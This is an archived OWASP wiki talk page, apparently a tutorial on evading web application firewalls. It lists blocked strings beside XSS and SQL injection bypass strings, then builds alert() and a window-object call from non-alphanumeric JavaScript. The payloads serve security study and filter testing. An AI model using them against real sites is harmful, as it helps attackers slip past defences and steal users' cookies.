This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
User talk:Vaibhav Khatke
WeB AppLiCaTiOn FiReWaLL ByPaSSiNg to produce XSS using Non-Alphanumeric characters.
What am I doing here?
I am describing simple bewilderment attacks that allow one to bypass security setup such as various output encoding input filters mechanisms used in multi-tier Web-apps, intrusion detection systems (IDS), intrusion prevention systems (IPS) ,web application firewalls (WAFs). There are several TUT on Waf-bypass but I think it is different and useful.
At the beginning we see and compare distinct HTML parsing methods and interpretation approaches used by most common html compilers that can lead to unique attack vectors. Javascript is another way that can be used to obfuscate or de-obfuscate code. We can create a non-alphanumeric Javascript code that is malicious.Sql injection is major flaw in today’s Web-apps.Will try to demonstrate Waf bypass for that as well. Abbreviations used: WAF, IPS, IDS, obfuscation, SQL injection, XSS, CSS, CSRF.
Assumption:Obfuscated payload=> the vector or string that will bypass WAF/
1 .Web-Application vulnerabilities, problems/WaF
1.1 Web Application Firewall (WAF)?
OWASP definition[1] says: “A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.” Waf was the extension of IDS/IPS designed to monitor HTTP and HTTP attacks. It contains Business logic that matches and detects attack based on the regular expression language it has. They use to contain functions to encrypt/decrypt cookie, CRSF protection etc.
1.2 Common WAF implementations
WAF works mostly only Blacklisting mode and that is why they are more vulnerable to attack and bypass. The term “Blacklisting” according to the OWASP definition [5] means “Reject known bad”. Adopting this strategy means that you will have to maintain the list of “known bad” characters and patterns
WAF with blacklisting:
Oswap says “In principle can only search for specific characters or character strings and prevent processing. Essentially there are problems with this approach in the degree of coverage as well as with possible filter evasion attacks (e.g. with multiple coding) if no input normalization is carried out. This works very well with known attacks (e.g. SQL injection), but certainly less well with protocols not known to the WAF or with proprietary protocols. In addition, injection attacks on some types of input data can be effectively prevented using URL encryption and hidden form parameter protection. An example of this is the item number in an online shop, which traditionally would often be used for SQL injection attacks, but it should never actually be possible for users to manipulate these directly. “ Much secure strategy is Whitelisting. And according to the OWASP definition [6], it means “Accept known good”: This strategy is also known as “whitelist” or “positive” validation. The idea is that you should check that the data is one of a set of tightly constrained known good values. Any data that doesn’t match should be rejected. Data should be: • Typed Strongly • checked length and minimized. • Range checked • by default unsigned. • Syntax and Grammar check. I Whitelisting mode all the user-inputs/out streams are checked. Also called application context.
Despite the Blacklisting Waf mode suffers from bypassing and attacks, it is cheap to install and implement for the customers not having control over their web-apps and supplier doesn’t provide security patches.
1.3 Web Application Firewall filter protocols.
There are a set of rule applied on the network/application to filter inputs/outputs. A system some time use security through obscurity as a defense in depth measure; while all known security vulnerabilities would be mitigated through other measures.
First step of an attacker is the information gathering and so he is delayed by security through obscurity.
Open-source WAFs (mod security, PHPIDS) have open-source rules. It helped a lot to make a WAF more secure.
Some Waf Bypass: Some Waf Bypass:
| Blocked by waf | Bypass Strings |
|---|---|
| eval(name) | x=this.name X(0?$:name+1) |
| alert(vaibs); | hex of alert(vaibs); |
| 1 or 1=1 | (1)or(1)=(1) |
| <img src=x:x onerror=alert(1)//></img> | <img src=http://url onload=alert(1)//></img> |
| <script type="text/javascript">// <![CDATA[
alert(/Welcome to Xss Waf Tut/) // ]]></script><script>alert(1)</script> |
<img src=”x:x” onerror=”alert(1)”></img> |
| 'or 1=1-- | ' or 9=9-- |
| ' or '='r | '/**/OR/**/'=' |
| <script>alert(1)</script> | <script type=vbscript>MsgBox(1)</script> |
| alert(1) | %00alert(1) |
1.4 Web Applications Vulnerabilities.
Web-application has increased portability/adaptability and made the complex work so much easy to perform .With all that comfort it suffers from Critical vulnerabilities which may be due to poor programming.
Like:
SQL injection Cross Site Scripting(client side injection) Local file inclusion Remote file inclusion CSRF D-dos
Increased in complexity increases the potential vulnerabilities of threats.
2 Bypassing Web Application Firewalls
I will try my best to demo you the bypass process in JS/SQL probably.
2.1 bypass flow a Hacker follow:
Tool used:live HTTP header.
1.First of all try to find the special character that is not seen by WAF
Put string in the vector in any Injection technique and see the HTTP response if it bypassed firewall or not as those characters will be useful.
2. create an obfuscated kinda injected payload as request to server.
Creating obfuscated code is very useful as it can bypass firewall filter Business Logic if it is poorly coded. Obfuscated code may be longer and it will work it the get/post data size is large enough.
3.Execute with the plan above to see the HTTP response from server.
See character or sequence of character that were bypassed by filters because that will come handy later. 4.If the response was -ve ie the payload was filtered then go for other sequence.
2.2 obfuscation in Javascript:
I assume you guys know basics of JS as it is very powerful/dynamic/common client side scripting.
Js Payload(vectors) are used by Attacker to produce XSS that will ravel user Cookie information. Many js functions come handy like below.
evals ()
expression closures (something similar to a typical Lambda notation), e.g.:
(function() alert(/Vaibs/)) () (function($)$(/Vaibs/)) (alert)
Expressions generator:
e.g.:
for ([]in[$=alert])$(/Vaibs/) $=[(alert)for([]in[0])][0],$(/2/) Iterators :
(An object that knows how to access items from a collection one at a time, while keeping track of its current position within that sequence).
e.g:
Iterator ([$=alert.1.]).next()[2],$(3)
Special Chars:
Js supports many encoding so you can create encoded payload (unicode – multibyte characters,hexadecimal, octal, or any combination of these and BASE64 function).
2.3 Javascript payload with Non Alphanumeric Chars:
Some time WAF filters the alphabets and numbers in payload.There the attacker think of way to inject with non alphanumeric chars.
Seeing the response from server we can create a fully functional obfuscated payload that will work.
Ex: Consider if these are characters that were bypassed-> (){}_=[];$”!+<>
Possible things we can do with JS.
Using JS Array index to get a character that was blocked by WAF.
Like I want alert as payload.Now first I want ‘a’. Getting ‘a’ from the string ‘rat’ is done like rat[1]. so ‘a’ =rat[1].
· we can use addition (+), subtraction (-), multiplication (*), division (/), modulus (%), increment (++), decrement (–) · Use JS mathematical operators for numeric conversion. ·Use String operators to perform string conversion.
Javascript objects and error codes in JS are useful for the alphanumeric conversion.
like:
hard-code it into your memory:
hard-code it into your memory:
| Js objects and error status | Bypass vectors |
|---|---|
| [![]]+[] | “false” |
| +[][+[]] | “NaN” |
| {}+ | “[object Object]” |
| [][+[]]+ | “undefined” |
| [!![]]+[] | “true” |
There are other methods to generate numbers if you dont want to use alphanumeric chars.Just use mathematical operators ‘+’/'-’ to generate 0 or zero.
Like:
+`’` =0 +”’”=o -[]=0 +[]=0
Using the same JS automatic conversion methods we can generate other numbers .
like:
+[]=0 ++[[]][+[]]=1 ++[++[[]][+[]]][+[]]=2
See the internal functioning of javascript numeric conversion functions for more details.In the same way we can generate other numbers.
2.3.1 Producing ‘alert’ without using numbers/alphabets.
If we wanna generate ‘a’ then we can use error cod Nan, which means “Not a Number” by accessing an empty string with index ’0′ – we get the state ‘undefined’ and converting it to the integer – we get ‘NaN’:
Hard code it into your memory that +[][+[]]=NaN
When we try to access the NaN with index ’1′ we expect to get ‘a’ Like NaN[1]=’a’.
But we need to convert NaN[1] to special character .Will let you know how below: We know that
++[[]][+[]] = 1. +[][+[]]+[] = NaN So , NaN[1] = (+[][+[]]+[])[++[[]][+[]]] = ‘a’ substituting the above we get ‘a’.
Now generating ‘l’ is as simple as above.Use ‘false’ error stat to get ‘l’ by accessing index 2 of false.
We know that
[![]]+[] = “false” ++[++[[]][+[]]][+[]] = 2 false[2]=([![]]+[])[++[++[[]][+[]]][+[]]]=’l’
Now i want to generate ‘e’ by using ‘true’ like we did above:
We know that
([!![]]+[])= ‘true’ ++[++[++[[]][+[]]][+[]]][+[]] =3 true[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] = ‘e’
Now ‘r’ and ‘t’ can be generated in the same manner below:
We know that ([!![]]+[])=’true’
+[]=0 ++[[]][+[]] =1 true[1] = ([!![]]+[])[++[[]][+[]]] =’r’ true[0] = ([!![]]+[])[+[]]=’ t’
So alert string without using alphanumeric characters will be (+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]]
2.3.2 You can execute code of your choice as well
We can force to execute code of our choice by using window object properties.We can call constructor,functions of the classes to execute arbitrary code. I will demo as simple as possible.
alert((1,[].sort)()) will show us window object
Older version of js leaks window object and so the reference of the object of JS class is lost.So the Access to the object is global and not limited to the class.We can use the same to produce something.
Now we try to generate alert((1.[].sort)()) that will show window alert.
We know the non alphanumeric value of alert.
Getting the same for “sort” is same
We can find s from ‘false’ i.e false[3]=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]=’s’
We can find ‘o’ from ” [object Object ]” state mentioned above.
viz:([]+{})[++[[]][+[]]]=’o’
We know ‘r’ and ‘t’ already.
So ‘sort’=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[]) [++[[]][+[]]]+([!![]]+[])[+[]]
Now we have Window object and we just need to call the alert function from it like below in non alphanumeric way:
(1,[].sort)().alert(1)
The obfuscated way will be=([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]]) which will show alert(1).
